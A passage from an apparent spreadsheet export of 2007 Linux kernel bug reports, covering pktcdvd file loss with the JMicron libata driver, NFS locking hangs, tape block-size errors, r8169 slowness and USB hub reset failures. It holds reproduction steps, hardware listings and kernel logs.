0000:01:08.0 Ethernet controller: 3Com Corporation 3c905 100BaseTX [Boomerang] 0000:01:09.0 Network controller: Intersil Corporation Prism 2.5 Wavelan chipset (rev 01) 0000:01:0b.0 SCSI storage controller: Adaptec AHA-2940U/UW/D / AIC-7881U Steps to reproduce: run system, do nothink</t>
  </si>
  <si>
    <t>pktcdvd doesn't work with libata JMicron driver</t>
  </si>
  <si>
    <t>2007-01-31 11:47 UTC</t>
  </si>
  <si>
    <t>2007-06-05 06:36 UTC</t>
  </si>
  <si>
    <t>Brief summary: When using JMicron libata driver (pata_jmicron) all files written to a CDRW with UDF fs and mounted through pktcdvd are lost after umount. The "legacy" driver works fine. Step to reproduce: root@dreamland:/tmp# pktsetup pkt0 /dev/scd0 pktcdvd: writer pktcdvd0 mapped to sr0 root@dreamland:/tmp# mount -t udf -o rw,noatime /dev/pktcdvd/pkt0 /cdrom pktcdvd: Fixed packets, 32 blocks, Mode-2 disc pktcdvd: Max. media speed: 4 pktcdvd: write speed 4x pktcdvd: 0kB available on disc UDF-fs INFO UDF 0.9.8.1 (2004/29/09) Mounting volume 'LinuxUDF', timestamp 2007/01/30 18:18 (103c) root@dreamland:/tmp# touch /cdrom/test root@dreamland:/tmp# ll /cdrom total 0 drwxr-xr-x 2 root root 40 2007-01-30 18:18 lost+found -rw-r--r-- 1 root root 0 2007-01-30 20:42 test root@dreamland:/tmp# umount /cdrom root@dreamland:/tmp# mount -t udf -o rw,noatime /dev/pktcdvd/pkt0 /cdrom pktcdvd: Fixed packets, 32 blocks, Mode-2 disc pktcdvd: Max. media speed: 4 pktcdvd: write speed 4x pktcdvd: 0kB available on disc UDF-fs INFO UDF 0.9.8.1 (2004/29/09) Mounting volume 'LinuxUDF', timestamp 2007/01/30 18:18 (103c) root@dreamland:/tmp# ll /cdrom total 0 drwxr-xr-x 2 root root 40 2007-01-30 18:18 lost+found File is lost (also note that pktcdvd reports wrong disk capacity). I've tried mounting /dev/scd0 rw *without* pktcdvd and I still lose files. So to recap, after formatting the disk with UDF: * libata - mount with pktcdvd: all files are lost upon umount - mount scd0 w/out pktcdvd: all files are lost upon umount - write the disk with cdrecord: OK pktcdvd reports wrong capacity: pktcdvd: Fixed packets, 32 blocks, Mode-2 disc pktcdvd: Max. media speed: 4 pktcdvd: write speed 4x pktcdvd: 0kB available on disc UDF-fs INFO UDF 0.9.8.1 (2004/29/09) Mounting volume 'LinuxUDF', timestamp 2007/01/30 18:18 (103c) * legacy IDE driver - mount with pktcdvd: OK - write the disk with cdrecord: OK pktcdvd reports correct capacity: pktcdvd: writer pktcdvd0 mapped to hda pktcdvd: Fixed packets, 32 blocks, Mode-2 disc pktcdvd: Max. media speed: 4 pktcdvd: write speed 4x pktcdvd: 551232kB available on disc UDF-fs INFO UDF 0.9.8.1 (2004/29/09) Mounting volume 'LinuxUDF', timestamp 2007/01/30 22:19 (103c) The HW is a JMicron controller: 02:00.0 IDE interface: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) 02:00.1 IDE interface: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) (one of the 2 has PATA ports) driven either by libata (CONFIG_PATA_JMICRON): PCI: Enabling device 0000:02:00.1 (0000 -&gt; 0001) ACPI: PCI Interrupt 0000:02:00.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:02:00.1 to 64 ata9: PATA max UDMA/100 cmd 0xAC00 ctl 0xA882 bmdma 0xA400 irq 19 ata10: PATA max UDMA/100 cmd 0xA800 ctl 0xA482 bmdma 0xA408 irq 19 scsi8 : pata_jmicron ata9.00: ATAPI, max UDMA/33 ata9.01: ATAPI, max UDMA/33 ata9.00: configured for UDMA/33 ata9.01: configured for UDMA/33 scsi9 : pata_jmicron ATA: abnormal status 0x7F on port 0xA807 scsi 8:0:0:0: CD-ROM HL-DT-ST DVDRAM GSA-4167B DL13 PQ: 0 ANSI: 5 sr0: scsi3-mmc drive: 48x/48x writer dvd-ram cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.20 sr 8:0:0:0: Attached scsi CD-ROM sr0 sr 8:0:0:0: Attached scsi generic sg1 type 5 scsi 8:0:1:0: CD-ROM WAITEC ALADAR/1 B1.5 PQ: 0 ANSI: 5 sr1: scsi3-mmc drive: 16x/40x writer cd/rw xa/form2 cdda tray sr 8:0:1:0: Attached scsi CD-ROM sr1 sr 8:0:1:0: Attached scsi generic sg2 type 5 or by the legacy driver (CONFIG_BLK_DEV_JMICRON): Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx JMB361: IDE controller at PCI slot 0000:02:00.1 PCI: Enabling device 0000:02:00.1 (0000 -&gt; 0001) ACPI: PCI Interrupt 0000:02:00.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 18 JMB361: chipset revision 2 JMB361: 100% native mode on irq 18 PCI: Setting latency timer of device 0000:02:00.1 to 64 ide0: BM-DMA at 0xa400-0xa407, BIOS settings: hda:pio, hdb:pio ide1: BM-DMA at 0xa408-0xa40f, BIOS settings: hdc:pio, hdd:pio Probing IDE interface ide0... hda: HL-DT-ST DVDRAM GSA-4167B, ATAPI CD/DVD-ROM drive hdb: WAITEC ALADAR/1, ATAPI CD/DVD-ROM drive ide0 at 0xac00-0xac07,0xa882 on irq 18 Probing IDE interface ide1... JMB361: IDE controller at PCI slot 0000:02:00.0 PCI: Device 0000:02:00.0 not available because of resource collisions ACPI: PCI Interrupt 0000:02:00.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 JMB361: BIOS configuration fixed. JMB361: chipset revision 2 JMB361: 100% native mode on irq 16 JMB361: dma_base is invalid ide2: JMB361 Bus-Master DMA disabled (BIOS) JMB361: dma_base is invalid ide3: JMB361 Bus-Master DMA disabled (BIOS) Probing IDE interface ide2... Probing IDE interface ide3... ALI15X3: IDE controller at PCI slot 0000:05:02.1 ACPI: PCI Interrupt 0000:05:02.1[A] -&gt; GSI 23 (level, low) -&gt; IRQ 19 ALI15X3: chipset revision 198 ALI15X3: 100% native mode on irq 19 ALI15X3: too many IDE interfaces, no room in table ALI15X3: too many IDE interfaces, no room in table (hum, must increase MAX_HWIF) ALI15X3: neither IDE port enabled (BIOS) hda: ATAPI 40X DVD-ROM DVD-R-RAM CD-R/RW drive, 2048kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.20 hdb: ATAPI 40X CD-ROM CD-R/RW drive, 8192kB Cache, UDMA(33) It has been reported that it's not possibile to reproduce the problem with a different libata driver: http://lkml.org/lkml/2007/1/31/258 this issue may be specific to JMicron driver. Original LKML thread for reference: http://lkml.org/lkml/2007/1/30/289</t>
  </si>
  <si>
    <t>Moto Q error with cdc-acm</t>
  </si>
  <si>
    <t>2007-01-31 19:51 UTC</t>
  </si>
  <si>
    <t>2008-09-22 11:38 UTC</t>
  </si>
  <si>
    <t>drivers/usb/class/cdc-acm.c: Zero length descriptor references cdc_acm: probe of 5-5.4:1.0 failed with error -22 usb 5-5.4: device_add(5-5.4:1.0) --&gt; -22 lsusb reveals: Bus 005 Device 022: ID 22b8:7001 Motorola PCS Same error as http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=91a9c9214e34c364bf15406aadb922787ae7129b</t>
  </si>
  <si>
    <t>Tape dies if wrong block size used</t>
  </si>
  <si>
    <t>2007-02-01 15:25 UTC</t>
  </si>
  <si>
    <t>2007-03-26 15:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17.14 Other Kernels Tested and Results: OK 2.6.15.7 OK 2.6.16.37 OK 2.6.17.14 BAD 2.6.18.6 BAD 2.6.18-1.2869.fc6 BAD 2.6.19.2 + BAD 2.6.20-rc5 NOTE: 2.6.18-1.2869.fc6 is a Fedora modified kernel, all others are from kernel.org Distribution: Fedora Hardware Environment: i386 Arch I386 Model Dell Poweredge 1300 Processor Pentium III (Coppermine) 697.929 Mhz. SCSI Adaptec AHA-2940U/UW/D / AIC-7881U Disks 3 QUANTUM ATLAS V 9 WLS in RAID 5 software raid attached to adaptech card above Tape HP C1537A attached to adaptech card above Software Environment: tar and mt Problem Description: I usually specify a tape block size, such as 'mt setblk 4096'. If I access the tape drive with the wrong tape block size, for instance 'tar -cvf /dev/tape foo', the screen fills with kernel errors. If I use the correct block size, as in 'tar -b 8 -cvf /dev/tape foo', it works fine. If I use the wrong block size I have to reboot to make the tape drive respond again. I've seen this problem on three systems with identical SCSI cards and different tape drives, so that makes me think it's the AIC7XXX driver. I've tested with several kernels to try and isolate when this problem was introduced. More details below. Interestingly, my main testing system is running software raid from the same scsi card with no problems, so this seems specific to tape drives. The other machine I've seen this on had a separate raid card, so you can't blame it on my software raid setup. Steps to reproduce: Get a Adaptec AHA-2940U/UW/D / AIC-7881U card and a tape drive, install a recent kernel set the tape block size - mt setblk 4096 read from or write to tape using wrong block size - tar -b 7 -cvf /dev/tape foo</t>
  </si>
  <si>
    <t>NFS locking problem</t>
  </si>
  <si>
    <t>2.6.20-rc7</t>
  </si>
  <si>
    <t>2007-02-02 04:49 UTC</t>
  </si>
  <si>
    <t>2008-09-23 10:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.11.10 Distribution: RHEL4 update 3 (x86_64), Fedora 6 (both i386 and x86_64); IRIX 6.5.22 Hardware Environment: HP DL585 (4x Opteron 848), Athlon FX51, Pentium 4 3.0GHz; SGI Origin2000 (IP27, 8x R12000) Software Environment: nfs-utils 1.0.6 from RHEL4, also 1.0.10-5 from FC6 Problem Description: After upgrading the NFS server (HP DL585) from 2.6.11.10 to 2.6.20-rc7 we see problems with locking from an IRIX 6.5.22 client. After a fresh reboot of both server and client, the locking sometimes works, but then after some time the fcntl(,F_SETLK,) just locks up, the process gets stuck in this syscall, and adds +1 to the system load average on the client. It can be suspended using ^Z on the terminal, but cannot be killed even with SIGKILL. It mainly affects our users who read their mail using mutt on the NFS client, because mutt uses the same syscall for locking. 2.6.11.10 was without problems. Steps to reproduce: On a Linux box: mkdir /tmp/test ls -l / &gt; /tmp/test/file echo '/tmp/test irix.box(ro,sync)' &gt;&gt;/etc/exports [ start nfs or run exportfs -r ] On an IRIX box: mount -t nfs -o vers=3,ro,soft,intr linuxbox:/tmp/test /mnt cat &gt; lktest.c &lt;&lt;EOF #include &lt;stdio.h&gt; #include &lt;unistd.h&gt; #include &lt;fcntl.h&gt; int main () { struct flock fl; int rv; fl.l_type = F_RDLCK; fl.l_whence = SEEK_SET; fl.l_start = 0; fl.l_len = 0; fprintf(stderr, "Trying to lock stdin:\n"); rv = fcntl(0, F_SETLK, &amp;fl); if (rv == 1) { perror("fcntl(0, F_SETLK, ...)"); return 1; } else { fprintf(stderr, "fcntl(0, F_SETLK, ...) == %d\n", rv); return 0; } } EOF cc -o lktest lktest.c ./lktest &lt; /mnt/file - it prints "Trying to lock stdin:", but nothing else (i.e. it gets stuck inside the fcntl call). Additional info: - tried both NFSv2 and NFSv3, rw and ro, soft,intr and without soft,intr with the same results. - the behaviour does not depend on SMP or UP on the Linux server. - the behaviour is the same on 32-bit and 64-bit Linux server. - I will attach two packet dumps of the NFS traffic - one is between the FC6/x86_64 server and IRIX client, and the other is between FC6/i386 server and the same IRIX client. - the client gets stuck in fcntl() even for a freshly created file without any locks held.</t>
  </si>
  <si>
    <t>same issue as closed bug 7555 with r8169 and slow transfer</t>
  </si>
  <si>
    <t>2007-02-02 07:29 UTC</t>
  </si>
  <si>
    <t>Tom Van den Eynde</t>
  </si>
  <si>
    <t>2007-10-10 14:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: n/a Distribution: Debian Stable Hardware Environment: Asus P5B-VM, Core 2 Duo, Software Environment: kernel 2.6.19.2 (SMP) with latest samba Problem Description: for a detailed description of the issue, please refer to http://groups.google.com/group/linux.samba/browse_thread/thread/1e10d5477e92c5da/6a63ceca71472c0a?lnk=st&amp;q=samba+running+slow&amp;rnum=1&amp;hl=en#6a63ceca71472c0a and http://groups.google.com/group/linux.samba/browse_frm/thread/8bf6e9791ae9b3cd/0a038c363be7ba2a#0a038c363be7ba2a as it was initially thouht to be a samba issue. However disabling the on-board network card and installing a simple 100 Mbit old RealTek card worked perfectly. Therefore, I think it is an issue with the r8169 driver. I also triend to insmod the r1000 (v1.05) module created by Realtek but that made the kernel panic so I don't know if the issue also exists in Realtek's own module. Kind regards, Tom</t>
  </si>
  <si>
    <t>arp_broken_ops" [drivers/net/wan/hostess_sv11.ko] undefined!</t>
  </si>
  <si>
    <t>linux-2.6.20-rc7-gce35a81a</t>
  </si>
  <si>
    <t>2007-02-04 04:06 UTC</t>
  </si>
  <si>
    <t>2007-02-17 12:56 UTC</t>
  </si>
  <si>
    <t>Baruch Even</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution:Gentoo Hardware Environment: Software Environment: Problem Description: WARNING: vmlinux - Section mismatch: reference to .init.text: from .text between 'iret_exc' (at offset 0xc037230f) and '_etext' WARNING: "arp_broken_ops" [drivers/net/wan/hostess_sv11.ko] undefined! make[1]: *** [__modpost] Error 1 make: *** [modules] Error 2 Steps to reproduce:</t>
  </si>
  <si>
    <t>Unable to initialize USB-Devices</t>
  </si>
  <si>
    <t>2007-02-04 13:43 UTC</t>
  </si>
  <si>
    <t>2012-05-24 21:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.6 (I did not test 2.6.19) Distribution: Debian Sid Hardware Environment: Hardware Environment: lspci -v: 0000:00:00.0 Host bridge: Intel Corporation Mobile 915GM/PM/GMS/910GML Express Processor to DRAM Controller (rev 03) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, fast devsel, latency 0 Capabilities: [e0] #09 [2109] 0000:00:01.0 PCI bridge: Intel Corporation Mobile 915GM/PM Express PCI Express Root Port (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 00003000-00003fff Memory behind bridge: c8100000-c81fffff Prefetchable memory behind bridge: d0000000-d7ffffff Capabilities: [88] #0d [0000] Capabilities: [80] Power Management version 2 Capabilities: [90] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Capabilities: [a0] #10 [0141] 0000:00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 04) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=09, subordinate=09, sec-latency=0 Capabilities: [40] #10 [0141] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 0000:00:1c.1 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 2 (rev 04) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=0a, subordinate=0a, sec-latency=0 Capabilities: [40] #10 [0141] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 0000:00:1c.2 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 3 (rev 04) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=02, subordinate=04, sec-latency=0 Capabilities: [40] #10 [0141] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 0000:00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 04) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0, IRQ 11 I/O ports at 1800 [size=32] 0000:00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 04) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0, IRQ 11 I/O ports at 1820 [size=32] 0000:00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 04) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0, IRQ 10 I/O ports at 1840 [size=32] 0000:00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 04) (prog-if 00 [UHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0, IRQ 10 I/O ports at 1860 [size=32] 0000:00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 04) (prog-if 20 [EHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0, IRQ 11 Memory at c8000000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Capabilities: [58] #0a [20a0] 0000:00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev d4) (prog-if 01 [Subtractive decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=06, subordinate=07, sec-latency=216 I/O behind bridge: 00004000-00004fff Memory behind bridge: c8200000-c82fffff Prefetchable memory behind bridge: 0000000050000000-0000000051f00000 Capabilities: [50] #0d [0000] 0000:00:1e.2 Multimedia audio controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 04) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0, IRQ 11 I/O ports at 1c00 [size=256] I/O ports at 1880 [size=64] Memory at c8000800 (32-bit, non-prefetchable) [size=512] Memory at c8000400 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 0000:00:1e.3 Modem: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Modem Controller (rev 04) (prog-if 00 [Generic]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0, IRQ 10 I/O ports at 2400 [size=256] I/O ports at 2000 [size=128] Capabilities: [50] Power Management version 2 0000:00:1f.0 ISA bridge: Intel Corporation 82801FBM (ICH6M) LPC Interface Bridge (rev 04) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0 0000:00:1f.1 IDE interface: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 04) (prog-if 8a [Master SecP PriP]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 0, IRQ 10 I/O ports at &lt;unassigned&gt; I/O ports at &lt;unassigned&gt; I/O ports at &lt;unassigned&gt; I/O ports at &lt;unassigned&gt; I/O ports at 18c0 [size=16] 0000:00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 04) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: medium devsel, IRQ 11 I/O ports at 20a0 [size=32] 0000:01:00.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility X700 (PCIE) (prog-if 00 [VGA]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, fast devsel, latency 0, IRQ 10 Memory at d0000000 (32-bit, prefetchable) [size=128M] I/O ports at 3000 [size=256] Memory at c8100000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at c8120000 [disabled] [size=128K] Capabilities: [50] Power Management version 2 Capabilities: [58] #10 [0001] Capabilities: [80] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- 0000:06:01.0 CardBus bridge: Texas Instruments PCIxx21/x515 Cardbus Controller Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, medium devsel, latency 168, IRQ 10 Memory at c8216000 (32-bit, non-prefetchable) [size=4K] Bus: primary=06, secondary=07, subordinate=08, sec-latency=176 Memory window 0: 50000000-51fff000 (prefetchable) Memory window 1: 52000000-53fff000 I/O window 0: 00004000-000040ff I/O window 1: 00004400-000044ff 16-bit legacy interface ports at 0001 0000:06:01.2 FireWire (IEEE 1394): Texas Instruments OHCI Compliant IEEE 1394 Host Controller (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: medium devsel, IRQ 11 Memory at c8217000 (32-bit, non-prefetchable) [size=2K] Memory at c8210000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 0000:06:01.3 Mass storage controller: Texas Instruments PCIxx21 Integrated FlashMedia Controller Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: medium devsel, IRQ 11 Memory at c8214000 (32-bit, non-prefetchable) [size=8K] Capabilities: [44] Power Management version 2 0000:06:03.0 Network controller: Intel Corporation PRO/Wireless 2200BG (rev 05) Subsystem: Intel Corporation: Unknown device 2701 Flags: bus master, medium devsel, latency 32, IRQ 11 Memory at c8218000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 0000:06:08.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5788 Gigabit Ethernet (rev 03) Subsystem: Acer Incorporated [ALI]: Unknown device 0066 Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 10 Memory at c8200000 (32-bit, non-prefetchable) [size=64K] Capabilities: [48] Power Management version 2 Capabilities: [50] Vital Product Data Capabilities: [58] Message Signalled Interrupts: 64bit+ Queue=0/3 Enable- Problem Description: I've connected a mouse and a Canon MP600 (multifunction device) on a mini hub which is then connected to the mainboard (USB2.0). Nothing is working on the mini hub because of the initialization problem. syslog output is: Feb 4 22:17:17 localhost kernel: [ 437.226673] usb 1-4: new high speed USB device using ehci_hcd and address 21 Feb 4 22:17:17 localhost kernel: [ 437.358978] usb 1-4: configuration #1 chosen from 1 choice Feb 4 22:17:17 localhost kernel: [ 437.359166] hub 1-4:1.0: USB hub found Feb 4 22:17:17 localhost kernel: [ 437.359266] hub 1-4:1.0: 4 ports detected Feb 4 22:17:17 localhost kernel: [ 437.678410] usb 1-4.2: new low speed USB device using ehci_hcd and address 22 Feb 4 22:17:17 localhost kernel: [ 437.794522] usb 1-4.2: configuration #1 chosen from 1 choice Feb 4 22:17:17 localhost kernel: [ 437.803697] input: HID 1241:1166 as /class/input/input8 Feb 4 22:17:17 localhost kernel: [ 437.803808] input: USB HID v1.00 Mouse [HID 1241:1166] on usb-0000:00:02.2-4.2 Feb 4 22:17:18 localhost kernel: [ 438.018167] usb 1-4.3: new high speed USB device using ehci_hcd and address 23 Feb 4 22:17:18 localhost kernel: [ 438.130296] usb 1-4.3: configuration #1 chosen from 1 choice Feb 4 22:17:18 localhost kernel: [ 438.133243] drivers/usb/class/usblp.c: usblp0: USB Bidirectional printer dev 23 if 1 alt 0 proto 2 vid 0x04A9 pid 0x1718 Feb 4 22:17:18 localhost kernel: [ 438.150140] scsi0 : SCSI emulation for USB Mass Storage devices Feb 4 22:17:18 localhost kernel: [ 438.150505] usb-storage: device found at 23 Feb 4 22:17:18 localhost kernel: [ 438.150591] usb-storage: waiting for device to settle before scanning Feb 4 22:17:20 localhost kernel: [ 440.505215] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.505464] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.505714] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.505962] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.506213] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.506272] hub 1-4:1.0: Cannot enable port 2. Maybe the USB cable is bad? Feb 4 22:17:20 localhost kernel: [ 440.506464] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.506711] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.506962] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.507212] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.507463] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.507711] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.507771] hub 1-4:1.0: Cannot enable port 2. Maybe the USB cable is bad? Feb 4 22:17:20 localhost kernel: [ 440.507962] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.508212] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.508460] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.508711] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.508961] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.509209] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.509269] hub 1-4:1.0: Cannot enable port 2. Maybe the USB cable is bad? Feb 4 22:17:20 localhost kernel: [ 440.509461] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.509710] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.509961] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.510209] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.510459] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.510710] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.510769] hub 1-4:1.0: Cannot enable port 2. Maybe the USB cable is bad? Feb 4 22:17:20 localhost kernel: [ 440.510961] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.511208] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:20 localhost kernel: [ 440.511460] hub 1-4:1.0: hub_port_status failed (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.146530] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.146779] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.147030] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.147280] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.147528] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.147588] hub 1-4:1.0: Cannot enable port 3. Maybe the USB cable is bad? Feb 4 22:17:23 localhost kernel: [ 443.147779] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.148029] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.148277] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.148528] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.148778] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.149026] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.149086] hub 1-4:1.0: Cannot enable port 3. Maybe the USB cable is bad? Feb 4 22:17:23 localhost kernel: [ 443.149277] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.149527] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.149777] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.150026] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.150277] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.150527] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.150587] hub 1-4:1.0: Cannot enable port 3. Maybe the USB cable is bad? Feb 4 22:17:23 localhost kernel: [ 443.150776] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.151025] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.151276] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.151527] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.151775] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.152025] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.152085] hub 1-4:1.0: Cannot enable port 3. Maybe the USB cable is bad? Feb 4 22:17:23 localhost kernel: [ 443.152278] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:23 